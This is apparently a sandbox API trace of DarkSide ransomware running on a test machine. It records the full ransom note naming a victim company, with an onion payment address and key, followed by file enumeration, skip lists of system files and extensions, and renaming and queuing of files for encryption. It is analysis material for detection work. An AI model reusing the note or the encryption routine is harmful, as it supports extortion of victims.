[0156.759] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0156.759] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0156.760] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx" [0156.760] GetNamedSecurityInfoW () returned 0x0 [0156.760] SetEntriesInAclW () returned 0x0 [0156.760] SetNamedSecurityInfoW () returned 0x0 [0156.768] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x17c270) returned 1 [0156.768] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e8ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0156.768] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix")) returned 1 [0156.768] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0156.768] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0156.768] WriteFile (in: hFile=0x1c, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e8bc, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e8bc*=0x7ca, lpOverlapped=0x0) returned 1 [0156.769] CloseHandle (hObject=0x1c) returned 1 [0156.770] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0156.770] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix")) returned 0x10 [0156.770] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\") returned="" [0156.770] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\") returned 0x35 [0156.770] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\*", fInfoLevelId=0x0, lpFindFileData=0x32eb1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32eb1c) returned 0x154148 [0156.770] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc60574c0, ftCreationTime.dwHighDateTime=0x1d5dac0, ftLastAccessTime.dwLowDateTime=0x8b237c40, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8b237c40, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.771] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f5be40, ftCreationTime.dwHighDateTime=0x1d5e73c, ftLastAccessTime.dwLowDateTime=0xd1b4e80, ftLastAccessTime.dwHighDateTime=0x1d5daca, ftLastWriteTime.dwLowDateTime=0xd1b4e80, ftLastWriteTime.dwHighDateTime=0x1d5daca, nFileSizeHigh=0x0, nFileSizeLow=0x3711, dwReserved0=0x0, dwReserved1=0x0, cFileName="3WrKbcrqGQWluTDrACp.png", cAlternateFileName="3WRKBC~1.PNG")) returned 1 [0156.771] _wcsicmp (_Str1="3WrKbcrqGQWluTDrACp.png", _Str2="README.c06622a1.TXT") returned -63 [0156.771] wcsstr (_Str="3WrKbcrqGQWluTDrACp.png", _SubStr="README") returned 0x0 [0156.771] _wcsicmp (_Str1="autorun.inf", _Str2="3WrKbcrqGQWluTDrACp.png") returned 46 [0156.771] wcslen (_String="autorun.inf") returned 0xb [0156.771] _wcsicmp (_Str1="boot.ini", _Str2="3WrKbcrqGQWluTDrACp.png") returned 47 [0156.771] wcslen (_String="boot.ini") returned 0x8 [0156.771] _wcsicmp (_Str1="bootfont.bin", _Str2="3WrKbcrqGQWluTDrACp.png") returned 47 [0156.771] wcslen (_String="bootfont.bin") returned 0xc [0156.771] _wcsicmp (_Str1="bootsect.bak", _Str2="3WrKbcrqGQWluTDrACp.png") returned 47 [0156.771] wcslen (_String="bootsect.bak") returned 0xc [0156.771] _wcsicmp (_Str1="desktop.ini", _Str2="3WrKbcrqGQWluTDrACp.png") returned 49 [0156.771] wcslen (_String="desktop.ini") returned 0xb [0156.771] _wcsicmp (_Str1="iconcache.db", _Str2="3WrKbcrqGQWluTDrACp.png") returned 54 [0156.772] wcslen (_String="iconcache.db") returned 0xc [0156.772] _wcsicmp (_Str1="ntldr", _Str2="3WrKbcrqGQWluTDrACp.png") returned 59 [0156.772] wcslen (_String="ntldr") returned 0x5 [0156.772] _wcsicmp (_Str1="ntuser.dat", _Str2="3WrKbcrqGQWluTDrACp.png") returned 59 [0156.772] wcslen (_String="ntuser.dat") returned 0xa [0156.772] _wcsicmp (_Str1="ntuser.dat.log", _Str2="3WrKbcrqGQWluTDrACp.png") returned 59 [0156.772] wcslen (_String="ntuser.dat.log") returned 0xe [0156.772] _wcsicmp (_Str1="ntuser.ini", _Str2="3WrKbcrqGQWluTDrACp.png") returned 59 [0156.772] wcslen (_String="ntuser.ini") returned 0xa [0156.772] _wcsicmp (_Str1="thumbs.db", _Str2="3WrKbcrqGQWluTDrACp.png") returned 65 [0156.772] wcslen (_String="thumbs.db") returned 0x9 [0156.772] _wcsicmp (_Str1="386", _Str2="png") returned -61 [0156.772] wcslen (_String="386") returned 0x3 [0156.772] _wcsicmp (_Str1="adv", _Str2="png") returned -15 [0156.772] wcslen (_String="adv") returned 0x3 [0156.772] _wcsicmp (_Str1="ani", _Str2="png") returned -15 [0156.772] wcslen (_String="ani") returned 0x3 [0156.772] _wcsicmp (_Str1="bat", _Str2="png") returned -14 [0156.772] wcslen (_String="bat") returned 0x3 [0156.772] _wcsicmp (_Str1="bin", _Str2="png") returned -14 [0156.772] wcslen (_String="bin") returned 0x3 [0156.772] _wcsicmp (_Str1="cab", _Str2="png") returned -13 [0156.772] wcslen (_String="cab") returned 0x3 [0156.772] _wcsicmp (_Str1="cmd", _Str2="png") returned -13 [0156.772] wcslen (_String="cmd") returned 0x3 [0156.772] _wcsicmp (_Str1="com", _Str2="png") returned -13 [0156.772] wcslen (_String="com") returned 0x3 [0156.772] _wcsicmp (_Str1="cpl", _Str2="png") returned -13 [0156.772] wcslen (_String="cpl") returned 0x3 [0156.772] _wcsicmp (_Str1="cur", _Str2="png") returned -13 [0156.772] wcslen (_String="cur") returned 0x3 [0156.772] _wcsicmp (_Str1="deskthemepack", _Str2="png") returned -12 [0156.773] wcslen (_String="deskthemepack") returned 0xd [0156.773] _wcsicmp (_Str1="diagcab", _Str2="png") returned -12 [0156.773] wcslen (_String="diagcab") returned 0x7 [0156.773] _wcsicmp (_Str1="diagcfg", _Str2="png") returned -12 [0156.773] wcslen (_String="diagcfg") returned 0x7 [0156.773] _wcsicmp (_Str1="diagpkg", _Str2="png") returned -12 [0156.773] wcslen (_String="diagpkg") returned 0x7 [0156.773] _wcsicmp (_Str1="dll", _Str2="png") returned -12 [0156.773] wcslen (_String="dll") returned 0x3 [0156.773] _wcsicmp (_Str1="drv", _Str2="png") returned -12 [0156.773] wcslen (_String="drv") returned 0x3 [0156.773] _wcsicmp (_Str1="exe", _Str2="png") returned -11 [0156.773] wcslen (_String="exe") returned 0x3 [0156.773] _wcsicmp (_Str1="hlp", _Str2="png") returned -8 [0156.773] wcslen (_String="hlp") returned 0x3 [0156.773] _wcsicmp (_Str1="icl", _Str2="png") returned -7 [0156.773] wcslen (_String="icl") returned 0x3 [0156.773] _wcsicmp (_Str1="icns", _Str2="png") returned -7 [0156.773] wcslen (_String="icns") returned 0x4 [0156.773] _wcsicmp (_Str1="ico", _Str2="png") returned -7 [0156.773] wcslen (_String="ico") returned 0x3 [0156.773] _wcsicmp (_Str1="ics", _Str2="png") returned -7 [0156.773] wcslen (_String="ics") returned 0x3 [0156.773] _wcsicmp (_Str1="idx", _Str2="png") returned -7 [0156.773] wcslen (_String="idx") returned 0x3 [0156.773] _wcsicmp (_Str1="ldf", _Str2="png") returned -4 [0156.773] wcslen (_String="ldf") returned 0x3 [0156.773] _wcsicmp (_Str1="lnk", _Str2="png") returned -4 [0156.773] wcslen (_String="lnk") returned 0x3 [0156.774] _wcsicmp (_Str1="mod", _Str2="png") returned -3 [0156.774] wcslen (_String="mod") returned 0x3 [0156.774] _wcsicmp (_Str1="mpa", _Str2="png") returned -3 [0156.774] wcslen (_String="mpa") returned 0x3 [0156.774] _wcsicmp (_Str1="msc", _Str2="png") returned -3 [0156.774] wcslen (_String="msc") returned 0x3 [0156.774] _wcsicmp (_Str1="msp", _Str2="png") returned -3 [0156.774] wcslen (_String="msp") returned 0x3 [0156.774] _wcsicmp (_Str1="msstyles", _Str2="png") returned -3 [0156.774] wcslen (_String="msstyles") returned 0x8 [0156.774] _wcsicmp (_Str1="msu", _Str2="png") returned -3 [0156.774] wcslen (_String="msu") returned 0x3 [0156.774] _wcsicmp (_Str1="nls", _Str2="png") returned -2 [0156.774] wcslen (_String="nls") returned 0x3 [0156.774] _wcsicmp (_Str1="nomedia", _Str2="png") returned -2 [0156.774] wcslen (_String="nomedia") returned 0x7 [0156.774] _wcsicmp (_Str1="ocx", _Str2="png") returned -1 [0156.774] wcslen (_String="ocx") returned 0x3 [0156.774] _wcsicmp (_Str1="prf", _Str2="png") returned 4 [0156.774] wcslen (_String="prf") returned 0x3 [0156.774] _wcsicmp (_Str1="ps1", _Str2="png") returned 5 [0156.774] wcslen (_String="ps1") returned 0x3 [0156.774] _wcsicmp (_Str1="rom", _Str2="png") returned 2 [0156.774] wcslen (_String="rom") returned 0x3 [0156.774] _wcsicmp (_Str1="rtp", _Str2="png") returned 2 [0156.774] wcslen (_String="rtp") returned 0x3 [0156.774] _wcsicmp (_Str1="scr", _Str2="png") returned 3 [0156.774] wcslen (_String="scr") returned 0x3 [0156.775] _wcsicmp (_Str1="shs", _Str2="png") returned 3 [0156.775] wcslen (_String="shs") returned 0x3 [0156.775] _wcsicmp (_Str1="spl", _Str2="png") returned 3 [0156.775] wcslen (_String="spl") returned 0x3 [0156.775] _wcsicmp (_Str1="sys", _Str2="png") returned 3 [0156.775] wcslen (_String="sys") returned 0x3 [0156.775] _wcsicmp (_Str1="theme", _Str2="png") returned 4 [0156.775] wcslen (_String="theme") returned 0x5 [0156.775] _wcsicmp (_Str1="themepack", _Str2="png") returned 4 [0156.775] wcslen (_String="themepack") returned 0x9 [0156.775] _wcsicmp (_Str1="wpx", _Str2="png") returned 7 [0156.775] wcslen (_String="wpx") returned 0x3 [0156.775] _wcsicmp (_Str1="lock", _Str2="png") returned -4 [0156.775] wcslen (_String="lock") returned 0x4 [0156.775] _wcsicmp (_Str1="key", _Str2="png") returned -5 [0156.775] wcslen (_String="key") returned 0x3 [0156.775] _wcsicmp (_Str1="hta", _Str2="png") returned -8 [0156.775] wcslen (_String="hta") returned 0x3 [0156.775] _wcsicmp (_Str1="msi", _Str2="png") returned -3 [0156.775] wcslen (_String="msi") returned 0x3 [0156.775] _wcsicmp (_Str1="pdb", _Str2="png") returned -10 [0156.775] wcslen (_String="pdb") returned 0x3 [0156.775] _wcsicmp (_Str1="sqlite", _Str2="png") returned 3 [0156.775] wcslen (_String="sqlite") returned 0x6 [0156.775] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix")) returned 0x10 [0156.775] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0156.775] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx" [0156.776] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx") returned 0x34 [0156.776] wcscpy (in: _Dest=0x32400ca, _Source="3WrKbcrqGQWluTDrACp.png" | out: _Dest="3WrKbcrqGQWluTDrACp.png") returned="3WrKbcrqGQWluTDrACp.png" [0156.776] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\3WrKbcrqGQWluTDrACp.png", dwFileAttributes=0x80) returned 1 [0156.776] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\3WrKbcrqGQWluTDrACp.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\3wrkbcrqgqwlutdracp.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b8 [0156.776] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.776] ReadFile (in: hFile=0x1b8, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0156.777] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xce6276c6 [0156.777] RtlComputeCrc32 (PartialCrc=0x76c6, Buffer=0x32e9a4, Length=0x80) returned 0xad3516ec [0156.777] RtlComputeCrc32 (PartialCrc=0x16ec, Buffer=0x32e9a4, Length=0x80) returned 0x49e94615 [0156.777] RtlComputeCrc32 (PartialCrc=0x4615, Buffer=0x32e9a4, Length=0x80) returned 0x7bf16ecd [0156.777] RtlComputeCrc32 (PartialCrc=0x6ecd, Buffer=0x32e9a4, Length=0x80) returned 0x3ca80b0c [0156.777] CloseHandle (hObject=0x1b8) returned 1 [0156.777] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0156.777] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\3WrKbcrqGQWluTDrACp.png" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\3WrKbcrqGQWluTDrACp.png") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\3WrKbcrqGQWluTDrACp.png" [0156.777] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\3WrKbcrqGQWluTDrACp.png") returned 0x4c [0156.777] wcscpy (in: _Dest=0x3250100, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.777] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\3WrKbcrqGQWluTDrACp.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\3wrkbcrqgqwlutdracp.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\3WrKbcrqGQWluTDrACp.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\3wrkbcrqgqwlutdracp.png.c06622a1"), dwFlags=0x8) returned 1 [0156.782] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\3WrKbcrqGQWluTDrACp.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\3wrkbcrqgqwlutdracp.png.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1b8 [0156.782] CreateIoCompletionPort (FileHandle=0x1b8, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0156.782] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3510020 [0156.790] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5c82ac3a [0156.790] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4f86e383 [0156.790] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x49f15e2e [0156.790] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4094682b [0156.790] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4ad3632d [0156.790] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x591ead54 [0156.790] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5a229d46 [0156.790] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3ada379a [0156.793] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3510094, Length=0x80) returned 0x6efbe164 [0156.793] RtlComputeCrc32 (PartialCrc=0xe164, Buffer=0x3510094, Length=0x80) returned 0xa168ec90 [0156.793] RtlComputeCrc32 (PartialCrc=0xec90, Buffer=0x3510094, Length=0x80) returned 0xdd7b5b87 [0156.793] RtlComputeCrc32 (PartialCrc=0x5b87, Buffer=0x3510094, Length=0x80) returned 0x97e5864a [0156.793] RtlComputeCrc32 (PartialCrc=0x864a, Buffer=0x3510094, Length=0x80) returned 0x4ac9d1e3 [0156.793] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3510020) returned 1 [0156.793] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0156.793] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0156.793] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c7d50, ftCreationTime.dwHighDateTime=0x1d5db1a, ftLastAccessTime.dwLowDateTime=0x5f947f40, ftLastAccessTime.dwHighDateTime=0x1d5dc66, ftLastWriteTime.dwLowDateTime=0x5f947f40, ftLastWriteTime.dwHighDateTime=0x1d5dc66, nFileSizeHigh=0x0, nFileSizeLow=0x11d21, dwReserved0=0x0, dwReserved1=0x0, cFileName="aaTy.m4a", cAlternateFileName="")) returned 1 [0156.793] _wcsicmp (_Str1="aaTy.m4a", _Str2="README.c06622a1.TXT") returned -17 [0156.793] wcsstr (_Str="aaTy.m4a", _SubStr="README") returned 0x0 [0156.793] _wcsicmp (_Str1="autorun.inf", _Str2="aaTy.m4a") returned 20 [0156.794] wcslen (_String="autorun.inf") returned 0xb [0156.794] _wcsicmp (_Str1="boot.ini", _Str2="aaTy.m4a") returned 1 [0156.794] wcslen (_String="boot.ini") returned 0x8 [0156.794] _wcsicmp (_Str1="bootfont.bin", _Str2="aaTy.m4a") returned 1 [0156.794] wcslen (_String="bootfont.bin") returned 0xc [0156.794] _wcsicmp (_Str1="bootsect.bak", _Str2="aaTy.m4a") returned 1 [0156.794] wcslen (_String="bootsect.bak") returned 0xc [0156.794] _wcsicmp (_Str1="desktop.ini", _Str2="aaTy.m4a") returned 3 [0156.794] wcslen (_String="desktop.ini") returned 0xb [0156.794] _wcsicmp (_Str1="iconcache.db", _Str2="aaTy.m4a") returned 8 [0156.794] wcslen (_String="iconcache.db") returned 0xc [0156.794] _wcsicmp (_Str1="ntldr", _Str2="aaTy.m4a") returned 13 [0156.794] wcslen (_String="ntldr") returned 0x5 [0156.794] _wcsicmp (_Str1="ntuser.dat", _Str2="aaTy.m4a") returned 13 [0156.794] wcslen (_String="ntuser.dat") returned 0xa [0156.794] _wcsicmp (_Str1="ntuser.dat.log", _Str2="aaTy.m4a") returned 13 [0156.794] wcslen (_String="ntuser.dat.log") returned 0xe [0156.794] _wcsicmp (_Str1="ntuser.ini", _Str2="aaTy.m4a") returned 13 [0156.794] wcslen (_String="ntuser.ini") returned 0xa [0156.794] _wcsicmp (_Str1="thumbs.db", _Str2="aaTy.m4a") returned 19 [0156.794] wcslen (_String="thumbs.db") returned 0x9 [0156.794] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0156.794] wcslen (_String="386") returned 0x3 [0156.794] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0156.794] wcslen (_String="adv") returned 0x3 [0156.794] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0156.794] wcslen (_String="ani") returned 0x3 [0156.794] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0156.795] wcslen (_String="bat") returned 0x3 [0156.795] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0156.795] wcslen (_String="bin") returned 0x3 [0156.795] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0156.795] wcslen (_String="cab") returned 0x3 [0156.795] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0156.795] wcslen (_String="cmd") returned 0x3 [0156.795] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0156.795] wcslen (_String="com") returned 0x3 [0156.795] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0156.795] wcslen (_String="cpl") returned 0x3 [0156.795] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0156.795] wcslen (_String="cur") returned 0x3 [0156.795] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0156.795] wcslen (_String="deskthemepack") returned 0xd [0156.795] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0156.795] wcslen (_String="diagcab") returned 0x7 [0156.795] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0156.795] wcslen (_String="diagcfg") returned 0x7 [0156.795] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0156.795] wcslen (_String="diagpkg") returned 0x7 [0156.795] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0156.795] wcslen (_String="dll") returned 0x3 [0156.795] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0156.795] wcslen (_String="drv") returned 0x3 [0156.795] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0156.795] wcslen (_String="exe") returned 0x3 [0156.795] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0156.795] wcslen (_String="hlp") returned 0x3 [0156.795] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0156.796] wcslen (_String="icl") returned 0x3 [0156.796] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0156.796] wcslen (_String="icns") returned 0x4 [0156.796] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0156.796] wcslen (_String="ico") returned 0x3 [0156.796] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0156.796] wcslen (_String="ics") returned 0x3 [0156.796] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0156.796] wcslen (_String="idx") returned 0x3 [0156.796] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0156.796] wcslen (_String="ldf") returned 0x3 [0156.796] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0156.796] wcslen (_String="lnk") returned 0x3 [0156.796] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0156.796] wcslen (_String="mod") returned 0x3 [0156.796] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0156.796] wcslen (_String="mpa") returned 0x3 [0156.796] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0156.796] wcslen (_String="msc") returned 0x3 [0156.796] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0156.796] wcslen (_String="msp") returned 0x3 [0156.796] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0156.796] wcslen (_String="msstyles") returned 0x8 [0156.796] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0156.796] wcslen (_String="msu") returned 0x3 [0156.796] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0156.796] wcslen (_String="nls") returned 0x3 [0156.797] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0156.797] wcslen (_String="nomedia") returned 0x7 [0156.797] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0156.797] wcslen (_String="ocx") returned 0x3 [0156.797] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0156.797] wcslen (_String="prf") returned 0x3 [0156.797] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0156.797] wcslen (_String="ps1") returned 0x3 [0156.797] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0156.797] wcslen (_String="rom") returned 0x3 [0156.797] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0156.797] wcslen (_String="rtp") returned 0x3 [0156.797] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0156.797] wcslen (_String="scr") returned 0x3 [0156.797] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0156.797] wcslen (_String="shs") returned 0x3 [0156.797] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0156.797] wcslen (_String="spl") returned 0x3 [0156.797] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0156.797] wcslen (_String="sys") returned 0x3 [0156.797] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0156.797] wcslen (_String="theme") returned 0x5 [0156.797] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0156.797] wcslen (_String="themepack") returned 0x9 [0156.797] 